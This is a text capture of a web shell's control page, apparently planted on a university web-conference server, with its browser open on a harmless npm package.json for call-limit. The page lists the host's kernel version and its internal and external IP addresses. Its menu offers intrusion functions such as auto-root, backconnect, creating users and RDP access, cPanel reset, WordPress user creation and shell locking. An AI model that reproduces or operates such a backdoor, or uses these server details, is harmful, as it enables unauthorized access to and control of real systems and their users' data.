Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.116.63.107
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
call-limit /
[ HOME SHELL ]
Name
Size
Permission
Action
call-limit.js
2.69
KB
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "call-limit", "version": "1.1.1", "description": "Limit the number of simultaneous calls to an async function", "main": "call-limit.js", "scripts": { "test": "tap test/*.js", "prerelease": "npm t", "release": "standard-version -s", "postrelease": "npm publish && git push --follow-tags", "pretest": "iarna-standard", "update-coc": "weallbehave -o . && git add CODE_OF_CONDUCT.md && git commit -m 'docs(coc): updated CODE_OF_CONDUCT.md'", "update-contrib": "weallcontribute -o . && git add CONTRIBUTING.md && git commit -m 'docs(contributing): updated CONTRIBUTING.md'" }, "repository": { "type": "git", "url": "https://github.com/iarna/call-limit" }, "author": "Rebecca Turner <me@re-becca.org>", "license": "ISC", "bugs": { "url": "https://github.com/iarna/call-limit/issues" }, "homepage": "https://npmjs.com/packages/call-limit", "dependencies": {}, "devDependencies": { "tap": "^14.2.0", "weallbehave": "*", "weallcontribute": "*", "@iarna/standard": "*", "standard-version": "*" }, "files": [ "call-limit.js" ] }
Close